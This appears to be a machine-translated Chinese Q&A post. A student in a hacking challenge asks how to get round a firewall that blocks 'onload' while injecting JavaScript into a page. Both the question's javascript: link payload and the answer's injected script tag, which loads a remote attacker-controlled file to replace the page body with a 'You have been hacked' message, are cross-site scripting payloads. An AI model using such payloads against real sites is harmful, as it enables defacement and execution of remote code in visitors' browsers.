我是一名必须应对实习黑客挑战的学生。我能够插入JavaScript代码。
唯一的问题是我必须处理防火墙。
到目前为止,我已经成功加载了带有JavaScript的<a>标记。
现在我正在尝试将网页更改为另一个页面。
不幸的是,防火墙阻止了“onload”&#39;声明。 还有另一种方法可以绕过这个吗?
看起来innerHtml只是本地的,它不会改变索引页面。
<a id="bb" href="javascript:document.body.innerHTML="foo"">clicks</a>
答案 0 :(得分:0)
您可以尝试在<head>部分中插入类似的内容:
<script src="http://url/to/myhackingcode.js"></script>
在你控制的myhackingcode.js中,你可以做到:
setTimeout(function() {
document.body.innerHTML = '<h1> You have been hacked </h1>';
// Any other things you'd like to do, come here
}, 1000);
哪个会用您提供的html替换页面的整个正文内容。